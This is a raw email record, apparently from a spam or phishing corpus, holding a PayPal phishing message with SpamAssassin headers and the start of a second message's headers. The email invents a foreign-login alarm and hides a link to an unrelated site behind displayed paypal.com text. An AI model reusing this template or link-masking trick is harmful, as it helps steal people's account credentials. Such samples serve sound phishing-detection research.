From: "PayPal Email ID PP321" <support@paypal.com>
Reply-To: "PayPal Email ID PP321" <support@paypal.com>
To: foobee@example.com
Subject: [*** POSIBLE SPAM***] PayPal Email ID PP321
Date: Thu, 12 Jan 2006 22:04:28 +0300
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--111742416066862139"
X-Priority: 1
X-MSMail-Priority: High
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at localhost
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at example.com
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: ***************
X-Spam-Status: Yes, score=15.3 required=5.0 tests=FORGED_MUA_OUTLOOK,
	FORGED_OUTLOOK_HTML,FORGED_OUTLOOK_TAGS,HTML_30_40,HTML_MESSAGE,
	MIME_BOUND_DD_DIGITS,MIME_HTML_ONLY,MIME_HTML_ONLY_MULTI,
	MISSING_MIMEOLE,MPART_ALT_DIFF,MSGID_SPAM_CAPS autolearn=no 
	version=3.0.2
X-Spam-Report: 
	*  4.1 MIME_BOUND_DD_DIGITS Spam tool pattern in MIME boundary
	*  3.8 MSGID_SPAM_CAPS Spam tool Message-Id: (caps variant)
	*  0.0 HTML_30_40 BODY: Message is 30% to 40% HTML
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 MPART_ALT_DIFF BODY: HTML and text parts are different
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  0.6 FORGED_OUTLOOK_HTML Outlook can't send HTML message only
	*  0.1 FORGED_OUTLOOK_TAGS Outlook can't send HTML in this format
	*  2.4 MIME_HTML_ONLY_MULTI Multipart message only has text/html MIME parts
	*  0.0 MISSING_MIMEOLE Message has X-MSMail-Priority, but no X-MimeOLE
	*  3.9 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
Status: O
X-Status: 
X-Keywords:                  
X-UID: 223

----111742416066862139
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<div id=3Dmessage>


<!-- type =3D text -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>

<title>Dear PayPal User</title>
</head>

<xbody>

<p>Dear PayPal User,<br>
<br>
We recently noticed one or more attempts to log in to your PayPal <br>
account from a foreign IP address.<br>
<br>
If you recently accessed your account while traveling, the unusual log <br=
>
in attempts may have been initiated by you. However, if you did not <br>
initiate the log ins, please visit PayPal as soon as possible to update <b=
r>
your account:<br>
<br>
<a   href=3D"http://solepoint.com/.us/index.php?MfcISAPICommand=3DSignInFP=
P" onclick=3D"return ShowLinkWarning()" onfiltered=3D"return ShowLinkWarni=
ng()"
>
https://www.paypal.com/us/cgi-bin/webscr?cmd=3D_login-run</a><br>
<br>
Changing your password is a security measure that will ensure that you <br=
>
are the only person with access to the account.<br>
<br>
Thanks for your patience as we work together to protect your account.<br>
<br>
Sincerely,<br>
PayPal <br>
<br>
<br>
----------------------------------------------------------------<br>
PROTECT YOUR PASSWORD<br>
<br>
NEVER give your password to anyone, including PayPal employees. Protect <b=
r>
yourself against fraudulent websites by opening a new web browser (e.g. <b=
r>
Internet Explorer or Netscape) and typing in the PayPal URL every time <br=
>
you log in to your account.<br>
<br>
<br>
----------------------------------------------------------------<br>
<br>
<br>
Please do not reply to this email. This mailbox is not monitored and <br>
you will not receive a response. For assistance, log in to your PayPal <br=
>
account and click the Help link located in the top right corner of any <br=
>
PayPal page.<br>
<br>
PayPal Email ID PP321<br>
<br>
<br>
&nbsp;</p>

</xbody>

</html>










<!-- toctype =3D X-unknown -->

<!-- toctype =3D text -->
<!-- text -->

















</div>



</html>


----111742416066862139--

From service@intl.paypal.com  Thu Jan 12 17:41:38 2006
Return-Path: <service@intl.paypal.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id 908DD536EC5
	for <nobody@login.example.com>; Thu, 12 Jan 2006 17:41:38 -0500 (EST)
Received: from mail2.example.com (localhost.example.com [127.0.0.1])
	by mail2.example.com (Postfix) with ESMTP id 018386FA458
	for <nobody@example.com>; Thu, 12 Jan 2006 17:41:21 -0500 (EST)
Received: from 192.168.64.2 (208-38-102-213.rev.sherbtel.net [208.38.102.213])
	by mail2.example.com (Postfix) with SMTP
	for <nobody@example.com>; Thu, 12 Jan 2006 17:41:18 -0500 (EST)
Received: from 142.120.114.169 by ; Thu, 12 Jan 2006 18:02:15 -0500
Message-ID: <WJZKXLZBNHWKADUQIAIN@charter.net>
